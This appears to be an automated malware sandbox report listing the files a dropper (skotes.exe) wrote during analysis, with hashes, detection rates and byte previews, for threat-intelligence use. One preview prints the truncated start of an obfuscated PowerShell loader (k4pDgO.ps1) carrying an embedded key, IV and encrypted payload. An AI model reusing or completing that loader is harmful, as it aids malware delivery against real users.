File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\k4pDgO[1].ps1

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	11165
Entropy (8bit):	5.987312137423171
Encrypted:	false
SSDEEP:	192:RnU9oCmmMifxgCHB962wIRPesAyu0efawpo01fDQEVrZ7IHwCG4:hD49pHRPeE/eFo01f8EVB4
MD5:	3CD3E3E2CA202F1265FEAE1803F841A4
SHA1:	70ECE53D7F62536399F96ACDBB47BFC2AD4CC7B8
SHA-256:	EB9352B17CE4C576E35DC16A8A0B4D4E743B27FAC673F708F330AA81188BBE6C
SHA-512:	C47469984170923DC8C9EC3B8B4B15985A78D358B959249F4C1DE2CB9FA57862DA5C9BE9E2C0967D554FEE288F4E979E72E1AC2A5EBC2792ADD12C623DE10018
Malicious:	false
Preview:	$decoded = ''..$eE5Nu0CTciel = '# I333652gsa512313..$Key = "APvS3eGB3FOH6'..$decoded += $eE5Nu0CTciel..$Sofo1z0zli36 = 'merG4l3wPOmzC32BKXZBt2DV8fhI+c="..$IV = "'..$decoded += $Sofo1z0zli36..$I3oUToTaosOK = 'VMQC8t+Oaj5NwtDF5Gga5w=="..$Encrypted = "'..$decoded += $I3oUToTaosOK..$Whf5Lv3YIblS = 'Tz6LmWQ6n8p+81lrCoglYJiBEErI6aqkeDpzTqSQ'..$decoded += $Whf5Lv3YIblS..$PHpVQ9WAr9oq = 'rHvZ4fyCGPN6VzV+1QjLSPyjpoVrsih2tZI3PBx6'..$decoded += $PHpVQ9WAr9oq..$GbvE9I5t9cwY = 'eH2GVW1qSswGSjOAbzIYRDSMKEbpjkEzk7oeqjCa'..$decoded += $GbvE9I5t9cwY..$hF8rOACYSSGs = 'bXp7Y7/BV5yjaT+y8rs0Owoh+HaBfbnjgEaq9puc'..$decoded += $hF8rOACYSSGs..$zQbdywfjvYWn = 'fZY2Rxfid+pGHy0klAKX90OYmEekYiRJM+pqD3A6'..$decoded += $zQbdywfjvYWn..$3m8hArU01mEs = 'bK/gbxp9CkJfmXWIPIJIbJ1OMLOuWfCZZiC3KdYg'..$decoded += $3m8hArU01mEs..$InFdKJMws0Tl = '1U615L1g14M9U07vMEvlC/lXNavZyFSUbSacl/Ft'..$decoded += $InFdKJMws0Tl..$OMPzFPvPQeEn = 'l9WyTcbr8y5epVLAzN/V7fVMYpg7rbSBLxiOL1te'..$decoded += $OMPzFPvPQeEn..$cKuA2aWZW2Qe = 'b0gWbsIm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2786816
Entropy (8bit):	6.459252009939243
Encrypted:	false
SSDEEP:	24576:Du3ri2VyKnxraHPuJRDlHK4vNod9mOqvAm2w7tZcZDarx9g9ZG2Fkb4OkabEaYYk:Du7rwPyRIdetyNHZ0bEaTv+JVMsg
MD5:	F6AF95F6A9FA7B7AD15A1A6944A12A18
SHA1:	9F7F6553D4F330FCA597224D4E2D419F9A951AC1
SHA-256:	4604CF4BD8899EA4302613B78D03A8D31D54E827E01644BC7D739F430BE91CA3
SHA-512:	23BA2B38D909EAC5D92367DFB4EF3F8FCB465A439273F6605CACCB5A58EB7BA6106012476BED0B5DDD96E82DA23E9F2EAAD07F5F49B0DDB70B197883857B3573
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 37%
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$............+.. ...`....@.. .......................@+..........`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...yficgynw.@......&..:..............@...ryhifnco. ..........`.............@....taggant.@....+.."...d.............@...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\suspendedpage[1].htm

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	HTML document, ASCII text, with very long lines (4070)
Category:	dropped
Size (bytes):	7632
Entropy (8bit):	5.642810706330887
Encrypted:	false
SSDEEP:	192:olVZHCkA26xd3Q4JRveuTtMy47R/Ga0kVhFuPwf8Pn9wHHyJS5kQ:QJvVGaRF8I86qQ
MD5:	D60ACB6742B676A65F770C1AE8744A81
SHA1:	D248C95023930E0FD59E1C69C5FE63D3CB450426
SHA-256:	E8DB77C47F9457D16D7BF6848920AA1945EB1A5933C75256FCD88149D01A6174
SHA-512:	53D4B6641AF63BC64401A34BAE96E445FB54632A253CDC098AAB25A7E691950CABF362EE24941643BA3C6CB9E6E644B305961418AFD05815B7D0D2EB565E558F
Malicious:	false
Preview:	<!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;.

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	51752
Entropy (8bit):	5.041363061557955
Encrypted:	false
SSDEEP:	1536:ih4iUx0Nef+a54NdYLWrxiCwb6vxV3CNBQkj2ItAHkxflJdwUKp0UpXb7/HOh3:iqiU0Nef+a5sYLWrxiCwb6vxV3CNBQkN
MD5:	DDC91A9B0231F99E5AED1B2E7EB50856
SHA1:	1A7149E89E63E513B5FFB5433784E150AFF3435F
SHA-256:	FC69022884EDD3B4BCA20AA85F0787D1EEE74E58E54EA15CD07B21E4552EF2C2
SHA-512:	6BB1CFE7FA1C9E3BDD7F7BEC658423FA898DF4A5554495A295B6094CC08AE78B7A3A668A4760651302A7C62AF2ED2D630AF19128A4F6C717FD533B95199113B0
Malicious:	false
Preview:	PSMODULECACHE.D...@.8o.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Remove-Variable........Convert-String........Trace-Command........Sort-Object........Register-ObjectEvent........Get-Runspace........Format-Table........Wait-Debugger........Get-RunspaceDebug........Export-PSSession........Write-Error........Get-Date........Get-UICulture........Remove-PSBreakpoint........Get-PSCallStack........Export-Clixml........Update-TypeData........Remove-TypeData........fhx........Import-Clixml........Get-Culture........Format-Wide........New-Event........New-Object........Write-Warning........Write-Verbose........Set-Alias........Unblock-File........ConvertFrom-Json........Get-TypeData........Out-GridView........ConvertFrom-String........ConvertFrom-SddlString........Get-Member........Select-Object........Get-EventSubscriber........ConvertFrom-Csv........Debug-Runspace........New-Alias........Invoke-WebRequest....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	3628
Entropy (8bit):	5.531510352663861
Encrypted:	false
SSDEEP:	96:HALHxvIIwLgZ2KW9DpyDD89TqOOgzi7Jtxp+bZwS5:HMxAJEzW4D86gSJtxobeS5
MD5:	8605E16F3DFFBDEA5AC1117D52F4555D
SHA1:	253B910DECEB004B21942D8843C7F6999D3800FE
SHA-256:	BDB6B401E75A48027376620D5DA13FC40EEA90BD738FA9B46C8BF3A258DFEB2F
SHA-512:	05A24DD3B2BFAC8AA23B91B4658C7B4313D281C91A40D08A53026F209E418BBCAD0B09D1CC536A2CD09FA68DF1409842404F513B0C2DF4C933D1AC4E2307D3F7
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\1005627001\file1.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1888768
Entropy (8bit):	7.948300123547069
Encrypted:	false
SSDEEP:	49152:hYqu0vFW+AUN5RdXgzDjwNWGiQTRRTnNa+L++Gud9xeVvnSCcl:hNO5UzRMRjQTRRTnNuG34NQ
MD5:	FC29E2A6DEBBB8C620CD719369DE7F9F
SHA1:	BDB9510D39A79D4A09B81A2C65C4C31889510482
SHA-256:	8C5B530675E70D49D2C9D9F991852DBD4826A1B338D6DC58EA7B668CFE5862ED
SHA-512:	03AAE85EF13A14A9958BFEF05D9E665A777D4628AB2E36CFB41D7BBCFF3120B93A24FEE025EAABAB9564E0CC8FAE22F87AA9D8CBBE83E64956C1CAF0A6280060
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...;..g..............................J...........@...........................J.....H.....@.................................T0..h............................1...................................................................................... . .........>..................@....rsrc ..... .......N..............@....idata .....0.......N..............@... ..+..@.......P..............@...ytlmplcn.`...P0..Z...R..............@...gdxiagsi......J.....................@....taggant.0....J.."..................@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1005628041\k4pDgO.ps1

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	11165
Entropy (8bit):	5.987312137423171
Encrypted:	false
SSDEEP:	192:RnU9oCmmMifxgCHB962wIRPesAyu0efawpo01fDQEVrZ7IHwCG4:hD49pHRPeE/eFo01f8EVB4
MD5:	3CD3E3E2CA202F1265FEAE1803F841A4
SHA1:	70ECE53D7F62536399F96ACDBB47BFC2AD4CC7B8
SHA-256:	EB9352B17CE4C576E35DC16A8A0B4D4E743B27FAC673F708F330AA81188BBE6C
SHA-512:	C47469984170923DC8C9EC3B8B4B15985A78D358B959249F4C1DE2CB9FA57862DA5C9BE9E2C0967D554FEE288F4E979E72E1AC2A5EBC2792ADD12C623DE10018
Malicious:	true
Preview:	$decoded = ''..$eE5Nu0CTciel = '# I333652gsa512313..$Key = "APvS3eGB3FOH6'..$decoded += $eE5Nu0CTciel..$Sofo1z0zli36 = 'merG4l3wPOmzC32BKXZBt2DV8fhI+c="..$IV = "'..$decoded += $Sofo1z0zli36..$I3oUToTaosOK = 'VMQC8t+Oaj5NwtDF5Gga5w=="..$Encrypted = "'..$decoded += $I3oUToTaosOK..$Whf5Lv3YIblS = 'Tz6LmWQ6n8p+81lrCoglYJiBEErI6aqkeDpzTqSQ'..$decoded += $Whf5Lv3YIblS..$PHpVQ9WAr9oq = 'rHvZ4fyCGPN6VzV+1QjLSPyjpoVrsih2tZI3PBx6'..$decoded += $PHpVQ9WAr9oq..$GbvE9I5t9cwY = 'eH2GVW1qSswGSjOAbzIYRDSMKEbpjkEzk7oeqjCa'..$decoded += $GbvE9I5t9cwY..$hF8rOACYSSGs = 'bXp7Y7/BV5yjaT+y8rs0Owoh+HaBfbnjgEaq9puc'..$decoded += $hF8rOACYSSGs..$zQbdywfjvYWn = 'fZY2Rxfid+pGHy0klAKX90OYmEekYiRJM+pqD3A6'..$decoded += $zQbdywfjvYWn..$3m8hArU01mEs = 'bK/gbxp9CkJfmXWIPIJIbJ1OMLOuWfCZZiC3KdYg'..$decoded += $3m8hArU01mEs..$InFdKJMws0Tl = '1U615L1g14M9U07vMEvlC/lXNavZyFSUbSacl/Ft'..$decoded += $InFdKJMws0Tl..$OMPzFPvPQeEn = 'l9WyTcbr8y5epVLAzN/V7fVMYpg7rbSBLxiOL1te'..$decoded += $OMPzFPvPQeEn..$cKuA2aWZW2Qe = 'b0gWbsIm

C:\Users\user\AppData\Local\Temp\1005637001\l.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	HTML document, ASCII text, with very long lines (4070)
Category:	dropped
Size (bytes):	7632
Entropy (8bit):	5.642810706330887
Encrypted:	false
SSDEEP:	192:olVZHCkA26xd3Q4JRveuTtMy47R/Ga0kVhFuPwf8Pn9wHHyJS5kQ:QJvVGaRF8I86qQ
MD5:	D60ACB6742B676A65F770C1AE8744A81
SHA1:	D248C95023930E0FD59E1C69C5FE63D3CB450426
SHA-256:	E8DB77C47F9457D16D7BF6848920AA1945EB1A5933C75256FCD88149D01A6174
SHA-512:	53D4B6641AF63BC64401A34BAE96E445FB54632A253CDC098AAB25A7E691950CABF362EE24941643BA3C6CB9E6E644B305961418AFD05815B7D0D2EB565E558F
Malicious:	false
Preview:	<!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;.

C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3161088
Entropy (8bit):	6.639890660648805
Encrypted:	false
SSDEEP:	49152:AG19A5evolEegKT/6bIAgHGyuI3DC07aL6zKV:FUeQWegKz6bIAgGOjPKV
MD5:	238681147F0B917647D5950BA69B9AAE
SHA1:	4D408B1735D0DADE1B4DCC68E0CEBE56753493A2
SHA-256:	61EE7C3DF8F7280DC5BA896FC71827DE1DCE0242C9E7F4425914059E89FE52E9
SHA-512:	D7FD4FD8E1BF44CBB688CF0BE2F4F5DAD886963D96CC10CFDAE16153D7C19D865242C38BC53B2C7A45FB56FE513D8EC4FCE326461120DFB03D17B72A215F40BE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 39%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J...........@0...........@..........................p0.......1...@.................................T...h.......@........................................................................................................... . ............................@....rsrc...@...........................@....idata ............................@...cwahjnig..........................@...dpfgpfkz.....00.......0.............@....taggant.0...@0.."....0.............@...........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1815040
Entropy (8bit):	7.9467851595774155
Encrypted:	false
SSDEEP:	49152:zr6OE2OwYPoKIofoMnJT1LNHS4uiAch6SofcXQV:XxE2MEMT1L5S4uiOSofcX
MD5:	A12C379025757CC07DB3A875813F8B1E
SHA1:	F6EF51D787CF590DCE1D9F2B1CB66D4794EEB89E
SHA-256:	6515D31657B9961BB6B8BF78F59A27925E6BBDEFEE8B91C51D4133C9AEA703E1
SHA-512:	6DBA4296D7B4D7BA8599F33A79FD3A458FB2CF6116FD2EE00DBF46CE3E0EEAB1F5F26C7017D99A9794CC44AC36DADBE0E0EC499419B56F31D66AA78C26C1A15B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 37%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8..k..k..k.'k..k..k..k.&k..k...k..k...k..k...j..k..k..k.#k..k..k..kRich..k........................PE..L...O./g.....................@".......i...........@...........................i.....fX....@.................................M.$.a.............................$..................................................................................... . ..$......b..................@....rsrc ......$......r..............@....idata ......$......r..............@... ..*...$......t..............@...xxdbzcjj. ....O......v..............@...txsnlhpz......i.....................@....taggant.0....i.."..................@...................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2786816
Entropy (8bit):	6.459252009939243
Encrypted:	false
SSDEEP:	24576:Du3ri2VyKnxraHPuJRDlHK4vNod9mOqvAm2w7tZcZDarx9g9ZG2Fkb4OkabEaYYk:Du7rwPyRIdetyNHZ0bEaTv+JVMsg
MD5:	F6AF95F6A9FA7B7AD15A1A6944A12A18
SHA1:	9F7F6553D4F330FCA597224D4E2D419F9A951AC1
SHA-256:	4604CF4BD8899EA4302613B78D03A8D31D54E827E01644BC7D739F430BE91CA3
SHA-512:	23BA2B38D909EAC5D92367DFB4EF3F8FCB465A439273F6605CACCB5A58EB7BA6106012476BED0B5DDD96E82DA23E9F2EAAD07F5F49B0DDB70B197883857B3573
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 37%
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$............+.. ...`....@.. .......................@+..........`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...yficgynw.@......&..:..............@...ryhifnco. ..........`.............@....taggant.@....+.."...d.............@...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\58b76e5c-4194-412b-bf60-c4a9a86b457e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\5e2aa920-8667-4386-9a03-de6ba84c799e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	135771
Entropy (8bit):	7.802585890890899
Encrypted:	false
SSDEEP:	3072:LtlntxI0jRnnf4pTz8IayMaCRABlauflM+u0F/oWRW:pl4+hf4pTky1EABYufNFS4W
MD5:	DA75BB05D10ACC967EECAAC040D3D733
SHA1:	95C08E067DF713AF8992DB113F7E9AEC84F17181
SHA-256:	33AE9B8F06DC777BB1A65A6BA6C3F2A01B25CD1AFC291426B46D1DF27EA6E7E2
SHA-512:	56533DE53872F023809A20D1EA8532CDC2260D40B05C5A7012C8E61576FF092F006A197F759C92C6B8C429EEEC4BB542073B491DDCFD5B22CD4ECBE1A8A7C6EF
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[...........=.B.../EYp....i:........ua....w...\H.j....b....4...l.b.:u.%1z....}L.A.F.IZ.2^.j...!F.&@;L..z...02..`:J_@....m....qcQ.\|sD.r`vC.#.8lm...R.8.~A...."~)".[.M...o.a.H.$..(.d/.K.6......c........#.$..>.#..3..-...n4J.$-....N...s.G...3..q.e..(.B?."...9M......[0Y0....H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...H0F.!..w./B..$<......r-.'..xp.H..Q...8.!..R^...%..W0....q....g.D..~.".%............mo.:......<#a..e...Chp...x4z....!.!.a...qgo....p8.T.6...Z....?..CV...<..K...?....k..........q=....Y^........!..K...G...m.n..Y.Y.......u.Wf...TO".?.......U/Rd..Y....j....H..Q...{.....x.OQ.~+}...L.9_.:.,E.....q.0&...I;b..H...>...9.}.B

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0udbzoux.dwq.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g5an2sdh.2in.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tft51o41.wsl.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uie1j0co.id5.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vjaxtzvi.p1c.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wzszjyx1.fz0.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\a9de45cf-f0ac-4f58-9a79-c168f2ed54f2.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
